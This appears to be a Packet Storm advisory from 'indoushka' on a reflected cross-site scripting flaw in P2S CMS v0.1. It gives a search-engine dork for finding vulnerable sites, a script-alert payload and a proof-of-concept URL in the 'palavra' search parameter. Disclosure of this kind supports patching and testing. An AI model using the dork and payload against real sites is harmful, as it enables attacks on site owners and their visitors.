P2S CMS version 0.1 suffers from a cross site scripting vulnerability.
7bb6a5d8c0fb7077e0992b71833738c252f38ebb48abe398cde8f60022fba24c====================================================================================================================================
| # Title : P2s-cms v0.1 XSS Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) |
| # Vendor : https://www.primestart.net/ |
| # Dork : index.php?page=busca&palavra= |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine .
[+] Use Payload : <script>alert(/indoushka/);</script>
[+] http://127.0.0.1/avamcombr/index.php?page=busca&palavra=%3Cscript%3Ealert(/indoushka/);%3C/script%3E
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed